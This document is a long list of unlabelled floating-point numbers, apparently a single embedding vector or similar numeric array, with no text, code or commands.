-0.003354501910507679, 0.000856655475217849, 0.009002048522233963, -0.011206329800188541, 0.015622288919985294, 0.007574443239718676, -0.023181939497590065, -0.034824687987565994, -0.020178791135549545, 0.012301073409616947, -0.011716716922819614, -0.00796648021787405, 0.03855273127555847, 0.00576589722186327, -0.013706487603485584, -0.019350335001945496, -0.033019840717315674, -0.00792209804058075, -0.029321379959583282, 0.04846460372209549, -0.018359148874878883, -0.00025241979165002704, 0.003108554519712925, -0.0057215155102312565, -0.01348458044230938, 0.02374410443007946, 0.016731826588511467, 0.02276771143078804, 0.004149670712649822, 0.008994651027023792, -0.023344671353697777, 0.011687129735946655, -0.02952849306166172, 0.023847661912441254, 0.015015741810202599, 0.0061912196688354015, -0.007555950898677111, -0.014579324051737785, 0.024232301861047745, 0.02698395401239395, -0.003938858397305012, 0.011295092292129993, -0.004674851894378662, 0.007138025015592575, 0.002060041530057788, 0.0059027401730418205, 0.033552415668964386, -0.0019934691954404116, -0.021835699677467346, 0.010111586190760136, 0.01976456306874752, -0.00830673798918724, 0.015097108669579029, 0.010141173377633095, -0.01899528317153454, -0.0010993668111041188, 0.0006416825926862657, 0.005037300754338503, 0.00005721053094021045, 0.015459557063877583, -0.0011234068078920245, -0.008425088599324226, 0.028522513806819916, 0.007271169684827328, -0.05092037841677666, -0.021761730313301086, -0.02766447141766548, -0.00207668449729681, -0.0016513618174940348, -0.008476867340505123, -0.0029550683684647083, 0.026628902181982994, -0.006627637892961502, 0.0007262848084792495, 0.026199880987405777, 0.02253101021051407, -0.03375953063368797, 0.007973876781761646, 0.019749769940972328, 0.026199880987405777, 0.019202398136258125, 0.009260940365493298, -0.028211843222379684, -0.007641015574336052, 0.0038168092723935843, -0.022146370261907578, 0.011709320358932018, 0.017826570197939873, 0.05160089582204819, -0.008743156678974628, -0.01348458044230938, -0.004009129013866186, -0.01615486666560173, -0.02171734906733036, -0.0008353893645107746, -0.01393579225987196, 0.022945238277316093, 0.006394634954631329, -0.01449795812368393, 0.0003374843508936465, 0.0016717032995074987, -0.0021968844812363386, -0.02516431361436844, 0.003594901878386736, 0.012981589883565903, -0.0026277548167854548, -0.005865755490958691, -0.006890228483825922, 0.010599782690405846, 0.006420524325221777, -0.0208149254322052, -0.013950586318969727, -0.0021635983139276505, 0.0023318782914429903, -0.007448695600032806, 0.007685397285968065, -0.0022227736189961433, 0.003254643641412258, 0.025356631726026535, 0.009172177873551846, 0.007012277841567993, -0.002546388888731599, 0.0022948936093598604, 0.04018005356192589, -0.03976582735776901, -0.00269617629237473, -0.0008964139269664884, -0.023758897557854652, -0.013307054527103901, -0.016554301604628563, 0.009142589755356312, -0.016391567885875702, -0.024690909311175346, 0.02630343846976757, 0.005495909601449966, -0.012596949934959412, -0.012338058091700077, 0.003167729824781418, 0.0012852143263444304, -0.017486313357949257, 0.014594118110835552, -0.005373860243707895, -0.00024109327932819724, -0.001666155643761158, -0.009579007513821125, -0.007226788438856602, 0.019424304366111755, -0.004963331390172243, -0.0023078382946550846, 0.005632752552628517, -0.006320666056126356, -0.013159115798771381, 0.020533842965960503, 0.017072085291147232, -0.0024983088951557875, 0.028966328129172325, 0.004804297816008329, 0.01104359794408083, -0.0175898689776659, -0.011650145053863525, 0.005980407819151878, -0.013891411013901234, 0.018595850095152855, 0.002023056847974658, -0.0031566345132887363, 0.012804063968360424, 0.010303906165063381, 0.012589553371071815, 0.0005533818621188402, 0.007034468464553356, 0.0002258371387142688, -0.02051904797554016, -0.011620556935667992, 0.008476867340505123, -0.022146370261907578, -0.0021802412811666727, 0.0016504371305927634, -0.026702871546149254, 0.07414669543504715, -0.008195783942937851, -0.027220655232667923, -0.007315551396459341, -0.050594914704561234, -0.015518732368946075, -0.019483480602502823, -0.010725529864430428, -0.010178158059716225, -0.001772486255504191, 0.007537458557635546, -0.013706487603485584, -0.03127416595816612, 0.04636387899518013, 0.003763181623071432, -0.020755749195814133, 0.013765662908554077, -0.010599782690405846, 0.01864023134112358, 0.003668871009722352, 0.04231036826968193, 0.017989302054047585, 0.009852693416178226, -0.024705704301595688, 0.008728362619876862, -0.00741910794749856, -0.01969059370458126, 0.011147154495120049, -0.02796034701168537, 0.009741740301251411, -0.0018575508147478104, -0.0018316616769880056, -0.039410773664712906, -0.010414859279990196, -0.009231353178620338, -0.005580974277108908, 0.005562481936067343, -0.008158800192177296, 0.000015415060261148028, 0.008018258027732372, -0.016953734681010246, -0.0066572255454957485, -0.018521880730986595, -0.02186528779566288, 0.01729399338364601, 0.0023078382946550846, 0.002808979246765375, -0.00950503908097744, -0.020163996145129204, 0.02217595838010311, 0.009216559119522572, 0.026939572766423225, 0.005447829607874155, 0.0208149254322052, -0.004833885468542576, 0.012670919299125671, 0.01690935343503952, -0.01134687103331089, -0.01295939926058054, -0.023655341938138008, 0.02846333757042885, -0.007973876781761646, 0.01720522902905941, 0.009076017886400223, -0.0015256141778081656, -0.0076336185447871685, 0.004334593657404184, 0.01532641239464283, -0.020030852407217026, -0.02142147161066532, 0.0008122739964164793, -0.004049812443554401, 0.03961788862943649, -0.0073266467079520226, -0.006346554961055517, 0.009934060275554657, 0.03710293769836426, 0.013817441649734974, -0.022338690236210823, -0.022974824532866478, 0.000856655475217849, -0.013358832336962223, -0.009231353178620338, 0.012478599324822426, -0.00037909200182184577, 0.010873468592762947, 0.007981273345649242, 0.015459557063877583, -0.02321152575314045, -0.00318437279202044, 0.01825559139251709, 0.014749453403055668, 0.009593801572918892, -0.0009495792328380048, -0.00849166139960289, 0.019646212458610535, -0.0001872344728326425, -0.0044899289496243, 0.040387168526649475, 0.00792209804058075, -0.007452394347637892, 0.005836167838424444, 0.007500474341213703, -0.03597860410809517, 0.002807130105793476, -0.009549420326948166, 0.01404674630612135, -0.005580974277108908, -0.012870635837316513, 0.014557133428752422, -0.005732610821723938, 0.016199249774217606, 0.02546018920838833, 0.024084363132715225, 0.011783289723098278, -0.018507087603211403, -0.00550330663099885, -0.018285179510712624, 0.015814609825611115, 0.00008962983702076599, -0.008336326107382774, 0.0012768928427249193, 0.00886890385299921, 0.026643695309758186, 0.022856473922729492, 0.004101590719074011, -0.0008654393022879958, 0.040387168526649475, -0.021051626652479172, 0.015681464225053787, -0.002622207161039114, 0.008706171996891499, -0.030238598585128784, -0.02727983146905899, -0.007260074373334646, -0.0013721281429752707, 0.002267155097797513, 0.002588920993730426, -0.01624363102018833, 0.01344759576022625, -0.017796983942389488, -0.016776207834482193, -0.016095692291855812, 0.009830502793192863, -0.010081998072564602, 0.012167928740382195, -0.003165880683809519, -0.01622883602976799, -0.0040128277614712715, 0.006132044363766909, 0.011627954430878162, 0.026125911623239517, -0.003596751019358635, -0.0024483795277774334, -0.0010087545961141586, -0.01386922039091587, -0.004685947205871344, 0.002167296828702092, -0.007522664964199066, 0.025445396080613136, -0.017989302054047585, -0.007988670840859413, -0.0004872719291597605, -0.01869940757751465, -0.02014920301735401, -0.02748694457113743, -0.023847661912441254, -0.02532704547047615, 0.013965379446744919, 0.017160847783088684, 0.014867804013192654, 0.007038166746497154, 0.01608089916408062, 0.007138025015592575, -0.010215142741799355, 0.0008053393685258925, 0.005629054270684719, -0.01736796274781227, 0.017915334552526474, 0.0036411324981600046, -0.021761730313301086, 0.02711709961295128, -0.0005640149465762079, 0.01232326403260231, 0.016864972189068794, -0.02253101021051407, 0.008787537924945354, -0.0007424655486829579, -0.010866071097552776, 0.023951217532157898, -0.013166512362658978, 0.023418640717864037, 0.0030623236671090126, -0.011635350994765759, -0.022826887667179108, -0.015962546691298485, -0.014194684103131294, -0.001142823719419539, -0.021835699677467346, 0.01930595375597477, 0.0034931942354887724, -0.01698332279920578, 0.010096792131662369, -0.0018002247670665383, 0.022116782143712044, 0.0016689294716343284, 0.01569625921547413, 0.006402031984180212, 0.018240798264741898, 0.0059434231370687485, 0.013270069845020771, -0.005843564867973328, -0.0059212325140833855, 0.02733900584280491, 0.02300441265106201, 0.013950586318969727, 0.021317915990948677, -0.0014516450464725494, -0.011080581694841385, -0.0040572090074419975, -0.016643064096570015, 0.0042569260112941265, 0.0009995084255933762, 0.0028367177583277225, -0.0071232314221560955, -0.0075485543347895145, 0.014512752182781696, 0.005592069588601589, -0.024395033717155457, -0.008336326107382774, -0.008661789819598198, -0.0032269051298499107, 0.0020840815268456936, 0.01923198439180851, 0.009800915606319904, -0.0007947062840685248, 0.008365913294255733, 0.006161632016301155, -0.007744572591036558, 0.013491977006196976, 0.016435950994491577, -0.006849545519798994, -0.02766447141766548, -0.004796900786459446, -0.0029717115685343742, 0.009615992195904255, 0.011243314482271671, -0.013876616954803467, -0.008610012009739876, 0.006586954928934574, -0.0012315866770222783, -0.012212310917675495, -0.004985522478818893, 0.005163048394024372, 0.0057252137921750546, 0.010533209890127182, -0.01750110648572445, 0.00738212326541543, -0.012382439337670803, 0.002731311833485961, -0.015503938309848309, 0.003726197173818946, 0.012456408701837063, 0.015873784199357033, -0.012138341553509235, -0.008180990815162659, -0.010940040461719036, -0.015814609825611115, 0.0018954600673168898, -0.012604347430169582, -0.00424213195219636, 0.010215142741799355, -0.02261977270245552, -0.007596633862704039, 0.004863473121076822, -0.010037616826593876, 0.005507004912942648, -0.00006414514064090326, 0.01630280539393425, 0.0010799498995766044, -0.015444763004779816, 0.02787158451974392, -0.0007799124578014016, 0.0023152350913733244, 0.0204450786113739, -0.004338291939347982, 0.007297059055417776, -0.0028921947814524174, -0.016273217275738716, 0.0059434231370687485, 0.0068569425493478775, -0.006549970246851444, -0.006069170776754618, -0.000528417294844985, -0.015222855843603611, 0.009253543801605701, -0.009408879093825817, 0.00883191917091608, -0.0025722780264914036, 0.0029846560209989548, 0.012034784071147442, -0.025578539818525314, -0.0009042731253430247, -0.011701922863721848, -0.030771175399422646, 0.012116150930523872, -0.020016057416796684, -0.013277466408908367, 0.0033822404220700264, -0.0013268220936879516, 0.03319736570119858, -0.015962546691298485, 0.003670720150694251, 0.0025186503771692514, -0.01705729216337204, -0.013462389819324017, -0.012870635837316513, -0.017989302054047585, -0.004619374871253967, -0.005362764932215214, 0.01696852780878544, -0.007300757337361574, -0.0057437061332166195, -0.025830036029219627, 0.0037003078032284975, 0.027368593961000443, -0.011117566376924515, -0.012404629960656166, -0.0158441960811615, 0.015622288919985294, 0.014830819331109524, -0.004475134890526533, -0.006905022542923689, 0.0004590711905620992, -0.022294308990240097, 0.006490794941782951, -0.008536042645573616, -0.007075151428580284, -0.01750110648572445, 0.013765662908554077, 0.001496026525273919, 0.0021488044876605272, 0.012693109922111034, -0.0056808325462043285, 0.0054774172604084015, 0.007685397285968065, -0.03299025073647499, 0.018092859536409378, 0.0011437482899054885, -0.002657342469319701, -0.0006740440730936825, 0.019276365637779236, 0.010192952118813992, -0.0017299540340900421, 0.03488386049866676, -0.01239723339676857, -0.02803431637585163, 0.010207746177911758, 0.006686813198029995, -0.005322081968188286, 0.007089945022016764, -0.010170761495828629, 0.004197750706225634, -0.007803747896105051, -0.002193185966461897, 0.02622946910560131, 0.004508421290665865, -0.0018908369820564985, 0.0043197995983064175, 0.010962231084704399, 0.01025952398777008, -0.009645580314099789, 0.013884013518691063, -0.0017808078555390239, -0.016879765316843987, -0.002043398329988122, 0.0017022156389430165, 0.000533502665348351, -0.008898491971194744, 0.0124342180788517, 0.0043197995983064175, -0.018078066408634186, -0.004981823731213808, 0.015489145182073116, 0.009852693416178226, -0.01258215680718422, 0.011443031020462513, 0.00872096512466669, 0.02149544097483158, -0.021525029093027115, -0.0038685877807438374, -0.013233085162937641, 0.003445114241912961, -0.02074095606803894, -0.012389836832880974, -0.0022227736189961433, -0.01483821589499712, -0.009342306293547153, -0.0170424971729517, -0.0038500954397022724, -0.00015487296332139522, 0.008291943930089474, -0.02112559601664543, -0.010636767372488976, -0.039558712393045425, 0.0018862138967961073, 0.0005820449441671371, -0.004837583750486374, 0.017560280859470367, 0.01624363102018833, -0.019868120551109314, 0.01869940757751465, 0.0033360098022967577, -0.004164464306086302, -0.04216242954134941, -0.008802331984043121, 0.005377558991312981, -0.0031936189625412226, 0.009046429768204689, 0.016509920358657837, -0.0042569260112941265, 0.015459557063877583, 0.020622605457901955, -0.009253543801605701, 0.007811144459992647, 0.004771011881530285, 0.010851277969777584, 0.014956566505134106, 0.0076336185447871685, 0.008291943930089474, -0.013543755747377872, 0.00640573026612401, -0.009260940365493298, 0.002167296828702092, 0.012389836832880974, 0.013477182947099209, -0.00696789612993598, 0.026865603402256966, 0.013321847654879093, -0.005507004912942648, 0.01383223570883274, 0.020785337314009666, -0.01571105234324932, 0.01172411348670721, 0.013662106357514858, -0.026199880987405777, -0.01659868285059929, -0.010200348682701588, 0.003957350738346577, 0.00018677215848583728, 0.022131577134132385, 0.022028019651770592, -0.013366229832172394, -0.000022104070012574084, -0.0021377091761678457, 0.008617408573627472, -0.012589553371071815, 0.0016485879896208644, -0.011406046338379383, 0.026111118495464325, -0.010592385195195675, 0.011014009825885296, 0.0034414157271385193, -0.011435634456574917, 0.005100174341350794, -0.015222855843603611, 0.024661323055624962, -0.022486628964543343, 0.024824054911732674, -0.012552568688988686, 0.018226005136966705, -0.0075892372988164425, -0.002653644187375903, 0.02600756101310253, 0.0006943856133148074, -0.002418791875243187, -0.0044825319200754166, -0.0017299540340900421, -0.021732142195105553, 0.005370161961764097, -0.005222223699092865, 0.02906988561153412, 0.03636324405670166, 0.0015662972582504153, 0.00033147435169667006, -0.005270303692668676, -0.014867804013192654, -0.023492610082030296, 0.0012519282754510641, -0.009564214386045933, -0.0006523156189359725, 0.037457987666130066, 0.0011289544636383653, 0.007604030892252922, -0.016347186639904976, 0.011265505105257034, -0.022190751507878304, -0.002923631574958563, 0.009549420326948166, -0.003894476918503642, -0.010104188695549965, -0.008047846145927906, 0.0007211994379758835, 0.04133397340774536, -0.007030769716948271, -0.001594035653397441, 0.004700740799307823, 0.008277150802314281, -0.001949087716639042, 0.006283681374043226, -0.006734893191605806, -0.027989935129880905, 0.0010235484223812819, -0.011110169813036919, -0.014209478162229061, -0.02998710237443447, 0.003857492469251156, -0.0040757013484835625, -0.014779040589928627, 0.018655026331543922, -0.02614070661365986, 0.005843564867973328, 0.016391567885875702, 0.012330661527812481, 0.0047414242289960384, -0.0015709203435108066, 0.007700190879404545, 0.007936892099678516, -0.01089565921574831, -0.015947753563523293, 0.018507087603211403, -0.036925412714481354, -0.010725529864430428, -0.0044825319200754166, -0.002712819492444396, -0.017086878418922424, -0.004175559617578983, 0.03026818484067917, -0.006886530201882124, 0.0017068387242034078, -0.003445114241912961, -0.017974508926272392, -0.017915334552526474, -0.007319249678403139, -0.00939408503472805, 0.009157383814454079, -0.023921631276607513, 0.01757507584989071, -0.004412261303514242, 0.008573027327656746, -0.012552568688988686, -0.029469318687915802, -0.007485680282115936, -0.007060357369482517, -0.007241582032293081, 0.0003633735759649426, -0.015037932433187962, -0.01043704990297556, 0.0256968904286623, -0.009985838085412979, 0.00006668783316854388, 0.015104505233466625, 0.006549970246851444, 0.017175642773509026, 0.001906555495224893, 0.018965696915984154, -0.006716400850564241, 0.006978991441428661, -0.007526363246142864, -0.0032380004413425922, 0.0074117109179496765, 0.0012935359263792634, -0.004038716666400433, 0.024306269362568855, 0.01085867453366518, -0.0025131027214229107, -0.013122131116688251, -0.0204450786113739, 0.004959633108228445, 0.010903055779635906, 0.00636874558404088, 0.015252443961799145, -0.012730094604194164, -0.001432228134945035, -0.0032472466118633747, -0.014216874726116657, -0.001360108144581318, -0.02614070661365986, 0.0023818074259907007, -0.003465455723926425, -0.008928079158067703, 0.008314135484397411, 0.019779356196522713, -0.021746937185525894, 0.006335459649562836, 0.007400615606456995, -0.014779040589928627, -0.020548636093735695, 0.02352219633758068, 0.013358832336962223, 0.010170761495828629, -0.009275734424591064, -0.00020006349950563163, 0.006194918416440487, -0.008861507289111614, -0.010644163936376572, 0.01945389248430729, -0.008188387379050255, 0.005299891345202923, -0.006716400850564241, 0.005684530828148127, 0.0008659016457386315, 0.04183696582913399, 0.02720586210489273, -0.0025038565509021282, 0.006797766778618097, 0.007914701476693153, 0.007248979061841965, 0.010318699292838573, -0.0022745521273463964, -0.00010453924187459052, 0.002662890125066042, 0.023566579446196556, -0.0052555096335709095, 0.030386535450816154, -0.007973876781761646, -0.004194051958620548, -0.017915334552526474, 0.003069720696657896, 0.01937992312014103, 0.002509404206648469, -0.014978757128119469, 0.012426821514964104, 0.010614576749503613, 0.007064056117087603, -0.013270069845020771, -0.027812408283352852, -0.009763930924236774, 0.009024239145219326, 0.022960031405091286, 0.009053826332092285, -0.00006928831135155633, 0.0035819571930915117, 0.01773780770599842, -0.020829718559980392, 0.026865603402256966, -0.018048478290438652, -0.00149787578266114, -0.02125873975455761, -0.013721281662583351, -0.004697042517364025, 0.02103683352470398, 0.025667302310466766, -0.03293107450008392, 0.02938055619597435, 0.005292494315654039, -0.008639599196612835, -0.011169345118105412, 0.002747954800724983, -0.000907047011423856, 0.002858908614143729, 0.006098758429288864, -0.008195783942937851, -0.017530694603919983, -0.025756066665053368, -0.004338291939347982, 0.006439016666263342, -0.0003966596850659698, -0.0024483795277774334, 0.010614576749503613, 0.010570194572210312, -0.032871901988983154, -0.009874884970486164, -0.026170292869210243, -0.0021062721498310566, -0.002509404206648469, 0.0019028569804504514, 0.023640546947717667, -0.010703339241445065, -0.015681464225053787, -0.009083414450287819, -0.0015043480088934302, 0.0008756101015023887, -0.008395501412451267, -0.02352219633758068, -0.022782504558563232, -0.01179808285087347, 0.0006948478985577822, -0.01810765266418457, -0.00269617629237473, -0.010851277969777584, 0.015577907674014568, 0.012375042773783207, -0.0045232148841023445, -0.0026665886398404837, -0.015052726492285728, -0.0049707284197211266, -0.0019324446329846978, -0.006598050240427256, -0.009778724983334541, -0.0035264804027974606, -0.01190903689712286, -0.0049929190427064896, -0.008876300416886806, -0.029572876170277596, 0.00034696166403591633, 0.00012124009663239121, 0.016924146562814713, -0.00048126192996278405, 0.007437600288540125, -0.02886277064681053, 0.0138618228957057, -0.011465221643447876, 0.01773780770599842, 0.0018427569884806871, -0.0074302032589912415, -0.0011317282915115356, 0.008099624887108803, -0.01491218525916338, -0.008854109793901443, -0.022516217082738876, -0.01924677938222885, 0.010873468592762947, -0.009719549678266048, -0.009889678098261356, -0.004837583750486374, 0.028907153755426407, 0.005022506695240736, 0.0038685877807438374, 0.020237965509295464, 0.03612654283642769, -0.00348394806496799, -0.001225114450789988, 0.0037058554589748383, 0.00670530553907156, -0.023906836286187172, 0.0006019241409376264, -0.008639599196612835, -0.0012029237113893032, 0.007334043737500906, 0.00207668449729681, 0.004534310195595026, -0.03251684829592705, -0.012079166248440742, -0.011324680410325527, -0.013654709793627262, -0.021436266601085663, 0.0012177175376564264, 0.00674229022115469, 0.021687760949134827, -0.010925247333943844, 0.005688229575753212, -0.005451527889817953, 0.013203497044742107, 0.01727919839322567, -0.003916667774319649, 0.024631734937429428, 0.007604030892252922, 0.018891727551817894, 0.0027572009712457657, -0.01337362639605999, -0.01720522902905941, 0.005551386624574661, -0.010540607385337353, 0.00618012435734272, -0.014705071225762367, -0.008706171996891499, -0.010059807449579239, 0.007533760275691748, -0.0036041480489075184, 0.023418640717864037, -0.017086878418922424, -0.024883229285478592, -0.010363081470131874, -0.011842465028166771, 0.019882913678884506, 0.011753701604902744, -0.008425088599324226, -0.0013804497430101037, -0.004282814916223288, -0.002581524197012186, 0.0022172259632498026, 0.00497812544927001, 0.024069568142294884, -0.002326330402866006, -0.013307054527103901, -0.016791002824902534, -0.01834435574710369, 0.032871901988983154, 0.011657541617751122, 0.006590653210878372, -0.008225372061133385, 0.007885114289820194, -0.007936892099678516, 0.002174693625420332, -0.009904472157359123, -0.02871483378112316, 0.014926979318261147, -0.01645074412226677, -0.008728362619876862, -0.0017780340276658535, 0.019661005586385727, -0.0021099706646054983, -0.002771994797512889, 0.003202865133062005, 0.014342622831463814, 0.006339157931506634, 0.018211210146546364, 0.02179131843149662, -0.0019749768543988466, -0.0020452477037906647, 0.011339474469423294, -0.01258215680718422, -0.007744572591036558, -0.024661323055624962, 0.008994651027023792, 0.021288327872753143, 0.005643847864121199, -0.02043028548359871, -0.0023503703996539116, 0.016169661656022072, 0.018536673858761787, 0.020119614899158478, -0.0030586253851652145, -0.00250755506567657, -0.011028803884983063, 0.016347186639904976, -0.005381257273256779, -0.013062955811619759, 0.006749687250703573, -0.0040572090074419975, 0.00995625089854002, -0.00900944508612156, -0.006224506068974733, -0.01554832048714161, -0.0033785419072955847, -0.024232301861047745, 0.007019674405455589, -0.018521880730986595, -0.009860090911388397, -0.014889994636178017, 0.006990086752921343, -0.012988986447453499, -0.0057252137921750546, -0.014786438085138798, 0.013565946370363235, -0.001928746234625578, 0.011590969748795033, -0.0265253446996212, -0.0066350349225103855, -0.008084830828011036, -0.008898491971194744, 0.01869940757751465, 0.003278683638200164, -0.006812560837715864, 0.002365164225921035, -0.006346554961055517, -0.011228520423173904, 0.0015570510877296329, -0.01547435112297535, -0.018388736993074417, 0.019128428772091866, -0.013736075721681118, -0.0010059807682409883, -0.007515267934650183, -0.0064538102596998215, -0.03372994437813759, -0.006982689723372459, -0.008432486094534397, -0.040919747203588486, 0.0023281797766685486, 0.01089565921574831, -0.00450472254306078, -0.003924064803868532, 0.009098208509385586, -0.0228416807949543, 0.006760782562196255, 0.02149544097483158, -0.00032222821027971804, 0.012315867468714714, -0.006361349020153284, -0.0023947518784552813, 0.00932011567056179, 0.004182956647127867, -0.014956566505134106, -0.010096792131662369, 0.012219707481563091, -0.01156877912580967, -0.000014894964806444477, -0.013196100480854511, -0.004852377809584141, -0.006050678435713053, 0.03532767668366432, 0.01397277694195509, 0.017989302054047585, 0.010400066152215004, -0.0006023864261806011, -0.01172411348670721, 0.0064131272956728935, 0.004445547237992287, -0.014853009954094887, 0.014668087475001812, -0.008824522607028484, 0.017012909054756165, -0.013270069845020771, -0.009793518111109734, -0.006823656149208546, 0.003998033702373505, 0.018817758187651634, -0.0092091616243124, 0.0011733360588550568, -0.00450472254306078, 0.01713125966489315, 0.014926979318261147, -0.019720181822776794, 0.007126929704099894, -0.014142906293272972, 0.01871420070528984, 0.014527545310556889, 0.006154234986752272, -0.008084830828011036, 0.012308469973504543, -0.015082314610481262, 0.007023373153060675, 0.005000316072255373, -0.006439016666263342, -0.001479383441619575, 0.012197516858577728, 0.001469212700612843, -0.007197200320661068, 0.014239066280424595, -0.008965063840150833, 0.012863239273428917, 0.00749307731166482, 0.007481982000172138, 0.01577022857964039, 0.003946255426853895, 0.03402581810951233, -0.011901640333235264, -0.006157933734357357, -0.004367879591882229, 0.004334593657404184, -0.020548636093735695, 0.017619457095861435, -0.001383223570883274, -0.017796983942389488, 0.00008986098691821098, 0.02037111110985279, 0.03636324405670166, -0.00028478133026510477, -0.022294308990240097, 0.009090811014175415, 0.017338374629616737, 0.021658174693584442, -0.006997483782470226, 0.010962231084704399, -0.0020175091922283173, 0.014024555683135986, -0.0030845145229250193, 0.0019953183364123106, -0.005825072526931763, -0.004637867212295532, -0.01432043220847845, 0.013654709793627262, 0.021598998457193375, 0.0026462471578270197, -0.011036200448870659, 0.01591816544532776, 0.02230910211801529, 0.0000011846625511680031, 0.018891727551817894, -0.0011576175456866622, -0.030327361077070236, 0.0012547021033242345, 0.02818225510418415, 0.0027257639449089766, 0.0006046979688107967, -0.021140389144420624, 0.010459241457283497, -0.008728362619876862, 0.008735759183764458, -0.010289112105965614, -0.0034377172123640776, -0.015037932433187962, 0.006590653210878372, -0.00677927490323782, 0.013676900416612625, -0.006660923827439547, 0.009675167500972748, -0.004737725481390953, 0.024217506870627403, 0.00800346489995718, 0.011295092292129993, 0.005762198474258184, -0.0008303039940074086, 0.014142906293272972, 0.0014276050496846437, -0.03719170019030571, -0.008661789819598198, 0.009401481598615646, 0.006490794941782951, -0.0018298124196007848, -0.017308786511421204, -0.015755433589220047, 0.000536738836672157, -0.005976709071546793, -0.009815709665417671, -0.00396474776789546, 0.021391885355114937, 0.010392668657004833, 0.024469003081321716, -0.000466236931970343, 0.0015367096057161689, -0.01382483821362257, 0.015000948682427406, -0.005632752552628517, -0.004434451926499605, -0.006890228483825922, 0.0006546271615661681, 0.010045013390481472, 0.014594118110835552, 0.011117566376924515, -0.005433035548776388, 0.0013064804952591658, 0.0025963180232793093, -0.010318699292838573, -0.009105605073273182, 0.012715300545096397, 0.002039700048044324, -0.008691377937793732, 0.010533209890127182, 0.005507004912942648, -0.008195783942937851, -0.016569094732403755, -0.0104074627161026, 0.0011150853242725134, -0.001967580057680607, -0.003406280418857932, -0.02779761515557766, 0.010000632144510746, 0.008994651027023792, 0.0159329604357481, -0.023847661912441254, 0.003898175433278084, 0.027634883299469948, -0.03784262761473656, -0.032191384583711624, -0.010163364000618458, 0.003103006863966584, -0.009275734424591064, 0.0024391335900872946, 0.02028234675526619, 0.00900944508612156, 0.0055181002244353294, 0.011110169813036919, -0.0036429818719625473, -0.0003756247169803828, -0.0034025819040834904, 0.013166512362658978, -0.0006009995122440159, -0.00901684258133173, -0.002036001533269882, 0.0006555517902597785, -0.017116466537117958, 0.0001968273427337408, 0.002794185420498252, 0.004404864273965359, 0.013225688599050045, 0.02028234675526619, -0.014941773377358913, -0.025977972894906998, -0.012278882786631584, -0.033167775720357895, 0.004360482562333345, 0.003802015446126461, 0.007714984938502312, -0.010540607385337353, -0.00024525405024178326, -0.015725845471024513, 0.010651560500264168, 0.005026205442845821, 0.011287695728242397, -0.0044899289496243, 0.020163996145129204, -0.004142273683100939, 0.006006296724081039, 0.01386922039091587, -0.01071073580533266, 0.03494303673505783, 0.02952849306166172, -0.013647312298417091, -0.003016093047335744, -0.037457987666130066, 0.004353085998445749, 0.017752600833773613, 0.008683981373906136, -0.011265505105257034, -0.005762198474258184, -0.040387168526649475, 0.005200033076107502, 0.011561381630599499, -0.02862606942653656, 0.0009874884271994233, -0.004623073153197765, 0.0019324446329846978, -0.019024871289730072, 0.01855146884918213, 0.0017142356373369694, 0.010015426203608513, 0.003898175433278084, -0.02014920301735401, 0.014542339369654655, -0.0007341440650634468, 0.011406046338379383, -0.008070036768913269, -0.02472049742937088, 0.014853009954094887, 0.013654709793627262, -0.003820507787168026, 0.009667770937085152, -0.007552252616733313, -0.03630407154560089, 0.00991926621645689, -0.005751103162765503, 0.026406994089484215, -0.009660374373197556, 0.0030993083491921425, 0.02134750410914421, -0.004748820792883635, 0.00995625089854002, -0.00666832085698843, 0.004430753644555807, -0.013403214514255524, 0.002899591578170657, -0.006335459649562836, -0.001038342248648405, 0.014978757128119469, -0.019335541874170303, 0.0013342190068215132, -0.015385587699711323, -0.007714984938502312, 0.004182956647127867, 0.00039943354204297066, 0.017146054655313492, -0.01683538407087326, -0.014298241585493088, -0.01071073580533266, 0.009090811014175415, 0.0039018739480525255, -0.014549735933542252, -0.004693344235420227, -0.004064606036990881, -0.003186222165822983, 0.014542339369654655, -0.005407146643847227, 0.0011520698899403214, -0.010118982754647732, 0.02479446679353714, -0.01698332279920578, 0.00392776308581233, -0.03020901046693325, 0.02525307610630989, -0.004186655394732952, -0.019424304366111755, -0.0032860804349184036, 0.016199249774217606, -0.004020224791020155, -0.007774160243570805, -0.01766383834183216, -0.02938055619597435, 0.011768495664000511, -0.020992450416088104, 0.0014803081285208464, -0.00792209804058075, 0.01089565921574831, 0.008425088599324226, 0.011324680410325527, 0.022353483363986015, 0.007988670840859413, -0.009142589755356312, 0.014446179382503033, 0.023463021963834763, 0.013758266344666481, 0.006353951990604401, 0.014616308733820915, 0.0030049977358430624, -0.003835301613435149, 0.013551152311265469, 0.023389052599668503, 0.005961915478110313, 0.02162858657538891, -0.0001546418061479926, 0.013388420455157757, 0.02374410443007946, -0.008839315734803677, 0.010755117982625961, 0.004245830699801445, 0.00939408503472805, 0.0003451124357525259, 0.0019028569804504514, 0.016214042901992798, 0.012759682722389698, 0.02261977270245552, 0.009068620391190052, -0.003931461367756128, 0.0007831486291252077, 0.0018039231654256582, 0.0024964595213532448, 0.0008793085580691695, 0.007544855587184429, 0.0010069053387269378, -0.007027071435004473, 0.005647546146064997, 0.009911869652569294, -0.01932074874639511, 0.016406362876296043, -0.0032638898119330406, 0.0012510035885497928, 0.012204913422465324, -0.022664153948426247, 0.01849229261279106, 0.011302489787340164, 0.0038685877807438374, -0.01378785353153944, -0.008698774501681328, -0.0002686005609575659, 0.018447911366820335, 0.006058075465261936, -0.02682122215628624, -0.01772301457822323, -0.01884734444320202, 0.0023892042227089405, 0.00018492293020244688, -0.00397954136133194, -0.000022566377083421685, -0.012693109922111034, -0.002620358020067215, -0.006868037860840559, -0.0008095001103356481, -0.014165096916258335, 0.032871901988983154, -0.00047987501602619886, 0.0029865053948014975, 0.024898024275898933, 0.01727919839322567, -0.015341206453740597, 0.009490245021879673, 0.007574443239718676, 0.028004728257656097, -0.005762198474258184, -0.008728362619876862, 0.0005617034039460123, -0.006845846772193909, 0.0015783172566443682, -0.03772427886724472, 0.01529682520776987, -0.01834435574710369, -0.002771994797512889, 0.00984529685229063, 0.01659868285059929, -0.008499057963490486, 0.012826254591345787, -0.023936424404382706, 0.007452394347637892, 0.012878033332526684, 0.019483480602502823, 0.019261572510004044, 0.004663756582885981, -0.002919933060184121, 0.005858358461409807, 0.007001182064414024, 0.0066535272635519505, 0.00614313967525959, 0.018373942002654076, -0.007433902006596327, 0.004009129013866186, -0.0150601239874959, -0.006135743111371994, -0.014409194700419903, 0.017767395824193954, 0.018299972638487816, -0.0031381421722471714, -0.023048793897032738, 0.013928395695984364, 0.01991250179708004, 0.006150536704808474, -0.01044444739818573, -0.02014920301735401, 0.018359148874878883, -0.020933276042342186, -0.0075892372988164425, -0.010244730859994888, 0.0018270385917276144, -0.009778724983334541, 0.009401481598615646, 